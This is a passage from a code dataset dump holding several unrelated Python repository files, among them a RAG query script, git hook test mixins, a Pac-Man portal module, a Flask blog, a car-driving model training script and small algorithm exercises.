for p in pages])\n end_time = time.time()\n print(f\"chunking time: {end_time - start_time}\")\n print(f\"type: {type(chunks)}, len: {len(chunks)}, type: {type(chunks[0])}\")\n print(f\"type: list of {type(chunks[0])}, len: {len(chunks)}\") \n\n print()\n print(\"Looking at a sample chunk...\")\n print(chunks[0].metadata)\n print(chunks[0].page_content)\n\n print(\"Start inserting entities\")\n start_time = time.time()\n vector_store.add_documents(chunks)\n end_time = time.time()\n print(f\"LlamaIndex Milvus insert time for {len(chunks)} vectors: {end_time - start_time} seconds\")\n print(f\"type: {type(vector_store)}\")\n\nupload_document(file_path1)\nupload_document(file_path2)\n\nquestion = 'What is the salary per annum?'\nquery = [question]\nQUERY_LENGTH = len(query[0])\nprint(f\"query length: {QUERY_LENGTH}\")\n# METADATA_URL = \"\"\n# SEARCH_PARAMS = dict({\n# \"expr\": \"text = METADATA_URL\",\n# })\nstart_time = time.time()\ndocs = vector_store.similarity_search(\n question,\n k=4,\n param=None,\n verbose=True,\n )\nend_time = time.time()\nprint(f\"Milvus query time: {end_time - start_time}\")\nfor d in docs:\n print(d.metadata)\n print(d.page_content[:100])\nprint(f\"Count raw retrievals: {len(docs)}\")\n\nunique_sources = []\nunique_texts = []\nfor doc in docs:\n if doc.page_content not in unique_texts:\n unique_texts.append(doc.page_content)\n unique_sources.append(doc.metadata)\nprint(f\"Count unique texts: {len(unique_texts)}\")\n#[ print(text) for text in unique_texts ]\n\nformatted_context = list(zip(unique_sources, unique_texts))\ncontext = \"\"\nfor source, text in formatted_context:\n context += f\"{text} \"\nprint(len(context))\n\np = f\"\"\"You are a helpful and knowledgeable agent. To achieve your goal of answering a query\n correctly, you have access to contextual information. You are given a query and must produce a concise summary\n of maximum 500 words that uses the relevant information from the context, given in a grammatically correct and\n readable format.\n\n Query: {query}\n Context: {context}\n Your answer: \"\"\"\nresult = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-16k\",\n prompt=p,\n max_tokens=1000,\n temperature=0\n )\nanswer = result['choices'][0]['text'].lstrip('\\n')\n\nprint(answer)\n\ndef query_search(question):\n query = [question]\n QUERY_LENGTH = len(query[0])\n print(f\"query length: {QUERY_LENGTH}\")\n start_time = time.time()\n docs = vector_store.similarity_search(\n question,\n k=4,\n param=None,\n verbose=True,\n )\n end_time = time.time()\n print(f\"Milvus query time: {end_time - start_time}\")\n for d in docs:\n print(d.metadata)\n print(d.page_content[:100])\n print(f\"Count raw retrievals: {len(docs)}\")\n\n unique_sources = []\n unique_texts = []\n for doc in docs:\n if doc.page_content not in unique_texts:\n unique_texts.append(doc.page_content)\n unique_sources.append(doc.metadata)\n print(f\"Count unique texts: {len(unique_texts)}\")\n formatted_context = list(zip(unique_sources, unique_texts))\n context = \"\"\n for source, text in formatted_context:\n context += f\"{text} \"\n print(len(context))\n\n p = f\"\"\"You are a helpful and knowledgeable agent. To achieve your goal of answering a query\n correctly, you have access to contextual information. You are given a query and must produce a concise summary\n of maximum 500 words that uses the relevant information from the context, given in a grammatically correct and\n readable format.\n\n Query: {query}\n Context: {context}\n Your answer: \"\"\"\n result = openai.Completion.create(\n model=\"gpt-3.5-turbo-16k\",\n prompt=p,\n max_tokens=1000,\n temperature=0\n )\n answer = result['choices'][0]['text'].lstrip('\\n')\n\n print(answer)\n return {\"summary\": answer}\n\n#def practice_topic","repo_name":"grace-sodunke/ScholarSearch","sub_path":"app/rag_gpt4_api.py","file_name":"rag_gpt4_api.py","file_ext":"py","file_size_in_byte":6880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72581167274","text":"import os\nimport shutil\n\nfrom mixin_git import (\n GitMixin,\n GitRepository,\n )\nimport testutils\n\n\nclass ScriptsRepoMixin(GitMixin):\n '''\n A mixin used to represent a git repository which contains the clang-format-related scripts.\n\n How the scripts end up in the repo is decided by derived classes.\n By using classes derived from this mixin, you can get your tests to run in various\n configuration.\n '''\n\n def __init__(self, *args, **kwargs):\n super(ScriptsRepoMixin, self).__init__(*args, **kwargs)\n\n self.repo = None\n self.scripts_dir = None\n\n def setUp(self):\n super(ScriptsRepoMixin, self).setUp()\n\n assert not self.repo\n assert not self.scripts_dir\n\n # This class's config_repo doesn't return, but the derived ones do.\n self.repo = self.config_repo() # pylint: disable=assignment-from-no-return\n\n assert self.repo\n\n # If case we cloned the current repo but there's unstaged content.\n self.update_scripts()\n\n def update_scripts(self):\n '''\n Overwrite the scripts in the repo with the current version (including uncommitted changes).\n '''\n assert self.repo\n\n src_dir = self.this_repo_path()\n with self.repo.work_dir():\n if self.scripts_dir:\n testutils.makedirs(self.scripts_dir)\n shutil.copy(os.path.join(src_dir, 'apply-format'), self.apply_format_path)\n shutil.copy(os.path.join(src_dir, 'git-pre-commit-format'), self.pre_commit_hook_path)\n\n def tearDown(self):\n super(ScriptsRepoMixin, self).tearDown()\n\n self.repo = None\n self.scripts_dir = None\n\n def config_repo(self):\n '''\n Configure a git repository containing the scripts.\n\n Derived classes need to overwrite this.\n\n If the derived class puts the script in a subdirectory, then it should set\n `self.scripts_dir` to the relative path of the subdirectory.\n\n Return value:\n The newly configured GitRepository instance.\n '''\n assert not self.repo\n raise Exception('This method needs to be overwritten by derived classes.')\n\n def _get_script_path(self, script_name):\n if self.scripts_dir:\n return os.path.join(self.scripts_dir, script_name)\n\n return script_name\n\n @property\n def apply_format_path(self):\n '''\n The path of the apply-format script, relative to the repository top level dir.\n '''\n return self._get_script_path('apply-format')\n\n @property\n def pre_commit_hook_path(self):\n '''\n The path of the git pre-commit hook script, relative to the repository top level dir.\n '''\n return self._get_script_path('git-pre-commit-format')\n\n def write_style(self, style_dict):\n content_list = ['{}: {}'.format(k, v) for k, v in style_dict.items()]\n content = '\\n'.join(content_list)\n self.repo.write_file('.clang-format', content)\n\n\nclass ScriptsWorkTreeRepoMixin(ScriptsRepoMixin):\n '''\n A mixin used to represent a git repository which uses work trees.\n\n How the scripts end up in the repo is decided by derived classes.\n By using classes derived from this mixin, you can get your tests to run in various\n configuration.\n '''\n\n def setUp(self):\n super(ScriptsWorkTreeRepoMixin, self).setUp()\n\n # Now the repo should be setup, but we create an alternative worktree dir\n # and use that one instead of the main one.\n\n assert self.repo\n\n # checkout -f in case there are modified scripts (copied by update_scripts).\n # We will re-update the scipts anyway later.\n self.repo.git_check_output('checkout', '-f')\n\n # We don't know on which branch we are. It could be master, a work branch\n # or some branch created by GitHub.\n # We need a branch to use for the worktree and a different one on which\n # the old repo should be, so we just create too.\n worktree_branch = 'other-for-worktree'\n self.repo.git_check_output('checkout', '-b', worktree_branch)\n main_repo_branch = 'main-repo'\n self.repo.git_check_output('checkout', '-b', main_repo_branch)\n\n worktree_branch_path = os.path.join(self.make_tmp_sub_dir(),\n 'worktree-dir-for-branch--' + worktree_branch)\n self.repo.git_check_output('worktree', 'add', worktree_branch_path, worktree_branch)\n\n self.repo = GitRepository(worktree_branch_path)\n\n # The new module may have submodules, make sure they are synced.\n self.repo.git_check_output('submodule', 'update', '--init', '--recursive')\n\n # If case we cloned the current repo but there's unstaged content.\n self.update_scripts()\n\n\nclass CloneRepoMixin():\n '''\n A mixin representing a git repository cloned from this git repository.\n '''\n\n def config_repo(self):\n self.scripts_dir = '.'\n return self.clone_this_repo()\n\n def clone_this_repo(self):\n return self.clone_repo(self.this_repo_path())\n\n\nclass SubmoduleMixin():\n '''\n A mixin representing a git repository in which this git repository is added as a submodule.\n '''\n\n SUBMODULE_DIR = 'submodule'\n\n def config_repo(self):\n self.scripts_dir = self.SUBMODULE_DIR\n return self.new_repo_with_submodule()\n\n def new_repo_with_submodule(self):\n repo = self.new_repo()\n repo.git_check_output('submodule', 'add', self.this_repo_path(), self.SUBMODULE_DIR)\n repo.commit()\n return repo\n\n\nclass CopiedFilesMixin():\n '''\n A mixin representing a git repository in which the scripts from this git repository are\n directly copied.\n '''\n\n SCRIPTS_DIR = os.path.join('foo', 'bar', 'scripts')\n\n def config_repo(self):\n self.scripts_dir = self.SCRIPTS_DIR\n return self.new_repo_with_copied_scripts()\n\n def new_repo_with_copied_scripts(self):\n # The scripts will be copied by self.update_scripts.\n return self.new_repo()\n","repo_name":"barisione/clang-format-hooks","sub_path":"tests/mixin_scripts_repo.py","file_name":"mixin_scripts_repo.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"72"} +{"seq_id":"17428396331","text":"import pygame\nfrom pygame.sprite import Sprite\n\n\nclass PortalBullet(Sprite):\n def __init__(self, ai_settings, screen, spritesheet2, pacman):\n super(PortalBullet, self).__init__()\n self.ai_settings = ai_settings\n self.screen = screen\n\n self.imagerects = ((69, 42, 5, 5), (82, 42, 5, 5), (76, 39, 5, 5), (77, 45, 5, 5),\n (37, 43, 5, 5), (52, 41, 5, 5), (43, 36, 6, 6), (44, 44, 6, 6))\n self.images = spritesheet2.images_at(self.imagerects, colorkey=(0, 0, 0))\n self.current_image = None\n\n self.rect = self.images[0].get_rect()\n\n self.speed = ai_settings.bullet_speed\n self.direction = pacman.direction\n self.portal_switch = pacman.portal_switch\n self.pacman_rect = pacman.rect\n\n self.initialize_bullet()\n\n def initialize_bullet(self):\n if self.direction == 0:\n self.rect.right = self.pacman_rect.left\n self.rect.centery = self.pacman_rect.centery\n if not self.portal_switch:\n self.current_image = self.images[0]\n else:\n self.current_image = self.images[4]\n elif self.direction == 1:\n self.rect.left = self.pacman_rect.right\n self.rect.centery = self.pacman_rect.centery\n if not self.portal_switch:\n self.current_image = self.images[1]\n else:\n self.current_image = self.images[5]\n elif self.direction == 2:\n self.rect.bottom = self.pacman_rect.top\n self.rect.centerx = self.pacman_rect.centerx\n if not self.portal_switch:\n self.current_image = self.images[2]\n else:\n self.current_image = self.images[6]\n elif self.direction == 3:\n self.rect.top = self.pacman_rect.bottom\n self.rect.centerx = self.pacman_rect.centerx\n if not self.portal_switch:\n self.current_image = self.images[3]\n else:\n self.current_image = self.images[7]\n\n def draw(self):\n self.screen.blit(self.current_image, self.rect)\n\n def update_bullet(self):\n if self.direction == 0:\n self.rect.x -= self.speed\n elif self.direction == 1:\n self.rect.x += self.speed\n elif self.direction == 2:\n self.rect.y -= self.speed\n elif self.direction == 3:\n self.rect.y += self.speed\n\n def regress(self):\n if self.direction == 0:\n self.rect.x += 1\n elif self.direction == 1:\n self.rect.x -= 1\n elif self.direction == 2:\n self.rect.y += 1\n elif self.direction == 3:\n self.rect.y -= 1\n\n\nclass Portal(Sprite):\n def __init__(self, ai_settings, screen, spritesheet2):\n super(Portal, self).__init__()\n self.ai_settings = ai_settings\n self.screen = screen\n\n self.imagerects1 = ((42, 0, 10, 30), (12, 0, 9, 30))\n self.imagerects2 = ((0, 40, 33, 15), (66, 10, 28, 11))\n self.images = spritesheet2.images_at(self.imagerects1, colorkey=(0, 0, 0))\n self.images.extend(spritesheet2.images_at(self.imagerects2, colorkey=(0, 0, 0)))\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n self.rect.x -= self.rect.width\n self.portal_direction = None\n\n self.portal_active = False\n self.expiration_time = 0\n\n def initialize_portal(self, bullet, portal_switch):\n if bullet.direction == 0 or bullet.direction == 1:\n if not portal_switch:\n self.image = self.images[0]\n else:\n self.image = self.images[1]\n self.rect = self.image.get_rect()\n if bullet.direction == 0:\n self.portal_direction = 1\n self.rect.right = bullet.rect.left\n else:\n self.portal_direction = 0\n self.rect.left = bullet.rect.right\n self.rect.centery = bullet.rect.centery\n if bullet.direction == 2 or bullet.direction == 3:\n if not portal_switch:\n self.image = self.images[2]\n else:\n self.image = self.images[3]\n self.rect = self.image.get_rect()\n if bullet.direction == 2:\n self.portal_direction = 3\n self.rect.bottom = bullet.rect.top\n else:\n self.portal_direction = 2\n self.rect.top = bullet.rect.bottom\n self.rect.centerx = bullet.rect.centerx\n self.portal_active = True\n self.expiration_time = 0\n\n def draw(self):\n self.screen.blit(self.image, self.rect)\n\n def reset_portal(self, pacman):\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n self.rect.x -= self.rect.width\n self.portal_direction = None\n self.portal_active = False\n self.expiration_time = 0\n pacman.portals_active = False\n\n def expire_portal(self, pacman):\n if self.portal_active:\n self.expiration_time += 1\n if self.expiration_time == 60 * 10:\n self.reset_portal(pacman)\n\n\nclass SidePortals:\n def __init__(self, ai_settings, screen):\n self.ai_settings = ai_settings\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n self.left_x = self.screen_rect.centerx - self.ai_settings.block_width * 30.5\n self.right_x = self.screen_rect.centerx + self.ai_settings.block_width * 27.5\n self.y = self.ai_settings.block_height * 27 + self.ai_settings.screen_height * 1/8 + 1\n self.left_rect = pygame.Rect(self.left_x, self.y, ai_settings.entity_width, ai_settings.entity_height)\n self.right_rect = pygame.Rect(self.right_x, self.y, ai_settings.entity_width, ai_settings.entity_height)\n self.color = (0, 0, 0)\n\n def draw(self):\n self.screen.fill(self.color, self.left_rect)\n self.screen.fill(self.color, self.right_rect)\n\n def transport(self, entity):\n if entity.rect.left <= self.left_rect.left:\n entity.rect.right = self.right_rect.right - 1\n elif entity.rect.right >= self.right_rect.right:\n entity.rect.left = self.left_rect.left + 1\n","repo_name":"zippi100/PacMan","sub_path":"venv/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31738203632","text":"import requests\n\nURL = \"https://rapidapi.p.rapidapi.com/api/search/CustomImageSearchAPIV2\"\nHEADERS = {\n 'x-rapidapi-host': \"custom-search.p.rapidapi.com\",\n 'x-rapidapi-key': \"Your-X-RapidAPI-Key\"\n}\n\nquery = \"taylor swift\"\npage_number = 1\nsearch_engine_id = \"Your-Search-Engine-Id\"\n\nquery_string = {\"q\": query,\n \"pageNumber\": page_number,\n \"searchEngineId\": search_engine_id}\n\nresponse = requests.get(URL, headers=HEADERS, params=query_string).json()\n\nprint(response)\n\ntotalCount = response[\"totalCount\"]\n\nfor image in response[\"value\"]:\n url = image[\"url\"]\n name = image[\"name\"]\n title = image[\"title\"]\n\n provider = image[\"provider\"][\"name\"]\n\n image_url = image[\"url\"]\n image_height = image[\"height\"]\n imageWidth = image[\"width\"]\n\n thumbnail = image[\"thumbnail\"]\n thumbnail_height = image[\"thumbnailHeight\"]\n thumbnail_width = image[\"thumbnailWidth\"]\n\n print(\"Url: %s. Title: %s.\" % (url, name))\n","repo_name":"roikra/usearch-customsearch-api","sub_path":"ImageSearchAPITest.py","file_name":"ImageSearchAPITest.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6453118141","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 20:03:11 2018\n\n@author: Ugur\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.preprocessing import Imputer, LabelEncoder, OneHotEncoder, StandardScaler\nfrom sklearn.cross_validation import train_test_split\n\nveriler = pd.read_csv(\"2.3.1_eksikveriler.csv\")\nprint(veriler)\n\nnumerik_veri = veriler.iloc[:,1:4].values\nprint(numerik_veri)\n\n# eksik verileri işleme\nimputer = Imputer(missing_values=\"NaN\", strategy=\"mean\", axis=0)\nnumerik_veri = imputer.fit_transform(numerik_veri)\nprint(numerik_veri)\n\n# kategorik -> numerik\nulke = veriler.iloc[:,0:1].values\nprint(ulke)\n\nle = LabelEncoder()\nulke[:,0] = le.fit_transform(ulke[:,0])\nprint(ulke)\n\nohe = OneHotEncoder()\nulke = ohe.fit_transform(ulke).toarray()\nprint(ulke)\n\n# numpy to dataframe\nsonuc = pd.DataFrame(data = ulke, columns = [\"fr\", \"tr\", \"us\"])\nprint(sonuc)\n\nsonuc2 = pd.DataFrame(data = numerik_veri, columns = [\"boy\", \"kilo\", \"yas\"])\nprint(sonuc2)\n\ncinsiyet = veriler.iloc[:,-1].values\nprint(cinsiyet)\n\nsonuc3 = pd.DataFrame(data = cinsiyet, columns=['cinsiyet'])\nprint(sonuc3)\n\n# dataframe birleştirme\ns = pd.concat([sonuc, sonuc2], axis=1)\nprint(s)\n\ns2 = pd.concat([s, sonuc3], axis=1)\nprint(s2)\n\n# verilerin eğitim ve test için bölünmesi\nx_train, x_test, y_train, y_test = train_test_split(s, sonuc3, test_size = 0.33, random_state = 0)\n\n# verilerin ölçeklenmesi\nsc = StandardScaler()\nX_train = sc.fit_transform(x_train)\nX_text = sc.fit_transform(x_test)","repo_name":"inantubek/Udemy","sub_path":"makine-ogrenmesi/2_veriler.py","file_name":"2_veriler.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14228237648","text":"from tf_donkey import Model\nimport os\nfrom utils import *\nfrom generator import DataGenerator, preprocess_normalize_images_bin_annos\nfrom generator import batch_data_aug as data_aug_fn\nimport json\n\ndef update_config(save_dir, payload):\n path = save_dir+\"/config.json\"\n if os.path.exists(path):\n with open(path, 'r') as f: existing_config=json.load(f)\n payload.update(existing_config)\n\n with open(path, 'w') as f:\n json.dump(payload, f)\n\ndef main():\n import argparse as argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--train-txt', type=str, required=True)\n parser.add_argument('--test-txt', type=str, required=True)\n parser.add_argument('--save-dir', type=str, required=True)\n parser.add_argument('--num-bins', type=int, required=True)\n parser.add_argument('--lr', type=float, required=False, default = 0.001)\n parser.add_argument('--batch-size', type=int, required=False, default=50)\n parser.add_argument('--epochs', type=int, required=False, default=10)\n parser.add_argument('--data-dir', type=str, required=True)\n parser.add_argument('--shape', type=int, required=True, nargs=3, help=\"height width chanels\")\n parser.add_argument('--message', type=str, required=True)\n\n args = parser.parse_args()\n data_dir = args.data_dir\n image_dir = os.path.join(data_dir, \"images/\")\n anno_dir = os.path.join(data_dir, \"annotations/\")\n train_path = args.train_txt\n test_path = args.test_txt\n\n # Load list of image names for train and test\n raw_train = load_dataset(train_path)\n raw_test = load_dataset(test_path)\n\n # Create train and test generators\n num_bins = args.num_bins\n batch_size = args.batch_size\n train_gen = DataGenerator(batch_size=batch_size,\n dataset=raw_train[:200],\n image_dir=image_dir,\n anno_dir=anno_dir,\n preprocess_fn=preprocess_normalize_images_bin_annos,\n data_aug_fn=data_aug_fn,\n random_mirror=True)\n test_gen = DataGenerator(batch_size=batch_size,\n dataset=raw_test[:50],\n image_dir=image_dir,\n anno_dir=anno_dir,\n shuffle=True,\n preprocess_fn=preprocess_normalize_images_bin_annos,\n data_aug_fn=data_aug_fn,\n random_mirror=True)\n # Kick-off\n save_dir = args.save_dir\n epochs = args.epochs\n in_shape = args.shape\n lr = args.lr\n classes = [i for i in range(num_bins)]\n message = args.message\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n update_config(save_dir,\n {\"data_dir\" : data_dir,\n \"num_bins\" : num_bins,\n \"lr\" : lr,\n \"batch_size\" : batch_size,\n \"epochs\" : epochs,\n \"input_shape\" : in_shape,\n \"message\" : message})\n car_brain = Model(in_shape, classes=classes)\n car_brain.train(train_gen, test_gen, save_dir, epochs=epochs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tall-josh/my_donkey_car","sub_path":"training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72274068392","text":"from flask import Flask, request, redirect, render_template\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://build-a-blog:blog@localhost:8889/build-a-blog'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'lostgirl'\n\nclass Blog(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.String(1000))\n \n\n def __init__(self, title, body):\n self.title = title\n self.body = body\n\n@app.route('/', methods=['POST', 'GET'])\ndef redirect_to_blog():\n return redirect('/blog')\n\n\n@app.route('/addnewpost', methods=['POST', 'GET'])\ndef addnewpost():\n\n if request.method == 'POST':\n title_name = request.form['titlename']\n post_name = request.form['contribution']\n new_blog = Blog(title_name, post_name)\n title_error = ''\n contribution_error = ''\n if title_name == '':\n title_error = \"Please name your Blog\"\n\n if post_name == '':\n contribution_error = \"Please make a blog\"\n return render_template('addnewpost.html', title_error=title_error, contribution_error=contribution_error)\n else: \n db.session.add(new_blog)\n db.session.commit()\n return redirect('/blog?id={0}'.format(new_blog.id))\n\n return render_template('addnewpost.html')\n\n\n@app.route('/blog', methods=['GET'])\ndef blog():\n\n blogpost = request.args.get('id')\n if blogpost is not None:\n blogs = Blog.query.filter_by(id=blogpost)\n return render_template('blog-list.html', blogs=blogs)\n\n else:\n blogs = Blog.query.all()\n\n return render_template('blog.html', blogs=blogs)\n\nif __name__ == '__main__':\n app.run()","repo_name":"MaggieDunham/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42036085836","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\napp_name = 'music'\r\n\r\nurlpatterns = [\r\n\r\n\t# /music\r\n\turl(r'^(?P[0-9]+)/(?P[0-9]+)$', views.index, name='index'),\r\n\r\n\t# /music/13\r\n\turl(r'^(?P[0-9]+)/$', views.details, name='details'),\r\n\r\n\t# /music//favorite/\r\n\turl(r'^(?P[0-9]+)/favorite/$', views.favorite, name='favorite'),\r\n\r\n url(r'^back_details/(?P[0-9]+)$', views.back_details, name='back_details'),\r\n]","repo_name":"rajarshikhare/Music-player-Django","sub_path":"music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118702313","text":"from typing import List\n\n\nclass Solution:\n def __init__(self):\n self.rows = 0\n self.cols = 0\n self.dp = []\n\n def calculateMinimumHP(self, dungeon: List[List[int]]) -> int:\n self.rows, self.cols = len(dungeon), len(dungeon[0])\n self.dp = [[float('inf')] * self.cols for _ in range(self.rows)]\n\n for row in reversed(range(self.rows)):\n for col in reversed(range(self.cols)):\n cur_cell = dungeon[row][col]\n right_health = self.get_min_health(cur_cell, row, col + 1)\n down_health = self.get_min_health(cur_cell, row + 1, col)\n next_health = min(right_health, down_health)\n if next_health != float('inf'):\n min_health = next_health\n else:\n min_health = 1 if cur_cell >= 0 else 1 - cur_cell\n self.dp[row][col] = min_health\n\n return int(self.dp[0][0])\n\n def get_min_health(self, cur_cell, next_row, next_col):\n if next_row >= self.rows or next_col >= self.cols:\n return float('inf')\n next_cell = self.dp[next_row][next_col]\n return max(1, next_cell - cur_cell)\n","repo_name":"cabulous/leetcode","sub_path":"python/174.py","file_name":"174.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22211251206","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.measure import label\nfrom collections import Counter\nfrom skimage.filters import threshold_otsu, threshold_li, threshold_local\nfrom skimage.util import view_as_windows\n\n\n# chain algo\n\n# from the top clockwise\ndef neighbours4(y, x):\n\treturn (y-1, x), (y, x+1), (y+1, x), (y, x-1)\n\n\n# from the top clockwise\ndef neighbours8(y, x):\n\treturn ((y-1, x), (y-1, x+1), (y, x+1), (y+1, x+1), (y+1, x), (y+1, x-1),\n\t\t\t(y, x-1), (y-1, x-1))\n\n\ndef get_bounds(labelled, label=1, connectivity=neighbours8):\n\tpos = np.where(labelled == label)\n\tbounds = []\n\tfor y, x in zip(*pos):\n\t\tfor yn, xn in connectivity(y, x):\n\t\t\t# if on edge of the whole image\n\t\t\tif yn < 0 or yn > labelled.shape[0] - 1:\n\t\t\t\tbounds.append((y, x))\n\t\t\t\tbreak\n\t\t\telif xn < 0 or xn > labelled.shape[1] - 1:\n\t\t\t\tbounds.append((y, x))\n\t\t\t\tbreak\n\t\t\telif labelled[yn, xn] == 0:\n\t\t\t\tbounds.append((y, x))\n\t\t\t\tbreak\n\treturn bounds\n\n\ndef chain_algo(labelled, label=1, connectivity=neighbours8):\n\tresult = []\n\t# vector = {(y, x): value} (we get the directions counterclockwise from the right)\n\tvectors = {(0, 1): 0, (-1, 1): 1, (-1, 0): 2, (-1, -1): 3, (0, -1): 4, (1, -1): 5, (1, 0): 6, (1, 1): 7}\n\tbounds = np.array(get_bounds(labelled, label, connectivity))\n\t# print(bounds)\n\t\n\ty_bound = bounds[:, 0]\n\tx_bound = bounds[:, 1]\n\t# print(len(bounds))\n\t\n\t# get the first point \n\ty = bounds[0][0]\n\tx = bounds[0][1]\n\tprint(f\"The first point: {(y, x)}\")\n\n\tcurrent_direction = None\n\tprevious_direction = None\n\n\tfor i in range(len(bounds)):\n\n\t\tprint(f\"Current (y, x): {(y, x)}\")\n\n\t\tnbs = connectivity(y, x)\n\t\tfor nb in nbs:\n\t\t\tif labelled[nb[0], nb[1]] == 1:\n\t\t\t\ty_ = nb[0] - y\n\t\t\t\tx_ = nb[1] - x\n\t\t\t\tresult.append(vectors[y_, x_])\n\t\t\t\tx += x_\n\t\t\t\ty += y_\n\t\t\t\tbreak\n\n\n\t# # starting point\n\t# x = x_bound[0]\n\t# y = y_bound[0]\n\t# current_direction = None\n\n\t# # accidentally I made it go counterclockwise\n\t# for i in range(1, len(x_bound)):\n\t# \tprint(\"\\n\", i)\n\t# \tprint(\"x\", x, \"y\", y)\n\t# \tprint(\"direction\", current_direction)\n\n\t# \tprevious_direction = current_direction\n\t# \tcount = 0\n\t# \tnbs = connectivity(y, x)\n\t# \tprint(nbs)\n\t# \tprint(nbs[-1::-1])\n\t# \tprint()\n\t# \tfor yn, xn in nbs[::-1]:\n\t# \t\tcount += 1\n\t# \t\tif labelled[yn, xn] == 1:\n\t# \t\t\tprint(\"x\", x, \"xn\", xn)\n\t# \t\t\tprint(\"y\", y, \"yn\", yn)\n\t# \t\t\tprint(labelled[yn, xn])\n\t# \t\t\tprint()\n\t# \t\t\tx_ = xn - x\n\t# \t\t\ty_ = yn - y\n\t# \t\t\tcurrent_direction = vectors[(y_, x_)]\n\t# \t\t\tif previous_direction != current_direction:\n\t# \t\t\t\tcontinue\n\t# \t\t\tres.append(current_direction)\n\t# \t\t\tx = xn\n\t# \t\t\ty = yn\n\t# \t\t\tbreak\n\t# \tprint(\"Iterations:\", count)\n\treturn result\n\n\n# image = np.load(\"similar.npy\")\n\nimage = np.loadtxt(\"ex.dat\")\n\nlabelled = label(image)\n# print(labelled[90:110, 195:210])\nlabels = np.unique(labelled)[1:]\n# print(labels)\n\nbd = np.array(get_bounds(labelled, label=1))\n# print(bd)\nx_bound = bd[:, 1]\ny_bound = bd[:, 0]\n\n\n# print(chain_algo(labelled))\n\n\nplt.imshow(labelled)\nplt.scatter(x_bound, y_bound)\nplt.show()\n\n","repo_name":"MS-17/computer_vision","sub_path":"chain_algo_task7/chain_algo.py","file_name":"chain_algo.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16011140235","text":"# uncompyle6 version 3.2.3\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 2.7.5 (default, Jul 13 2018, 13:06:57) \n# [GCC 4.8.5 20150623 (Red Hat 4.8.5-28)]\n# Embedded file name: ./monitor/migrations/0010_auto_20171207_1554.py\n# Compiled at: 2018-08-23 19:33:14\n# Size of source mod 2**32: 1783 bytes\nfrom __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('monitor', '0009_auto_20171120_0656')]\n operations = [\n migrations.CreateModel(name='SQLMON',\n fields=[\n (\n 'id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n (\n 'created_at', models.DateTimeField()),\n (\n 'status', models.CharField(max_length=100, null=True)),\n (\n 'sql_id', models.CharField(max_length=100, null=True)),\n (\n 'elapsed_time', models.BigIntegerField(null=True)),\n (\n 'db_time', models.BigIntegerField(null=True)),\n (\n 'db_cpu', models.BigIntegerField(null=True)),\n (\n 'sql_exec_id', models.BigIntegerField(null=True)),\n (\n 'sql_exec_start', models.CharField(max_length=100, null=True)),\n (\n 'sql_plan_hash_value', models.BigIntegerField(null=True)),\n (\n 'inst_id', models.IntegerField(null=True)),\n (\n 'username', models.CharField(max_length=100, null=True)),\n (\n 'sql_text', models.TextField(max_length=100000, null=True)),\n (\n 'sqlmon', models.TextField(max_length=100000, null=True)),\n (\n 'database', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='monitor.Database'))]),\n migrations.AlterIndexTogether(name='sqlmon',\n index_together=set([('database', 'sql_id', 'sql_exec_id'), ('database', 'created_at')]))]\n# okay decompiling ./restful/hawkeye/monitor/migrations/0010_auto_20171207_1554.pyc\n","repo_name":"zsprn123/yunqu","sub_path":"restful/hawkeye/monitor/migrations/0010_auto_20171207_1554.py","file_name":"0010_auto_20171207_1554.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33350546499","text":"import math\n\n\n# Formulas specified here can be found in the following document:\n# https://www.mesonet.org/images/site/ASCE_Evapotranspiration_Formula.pdf\n# Page number of each formula is supplied with each function.\n\ndef get_delta(temp):\n \"\"\"\n Reference page number: 28-29\n Parameters\n ------------------------------\n 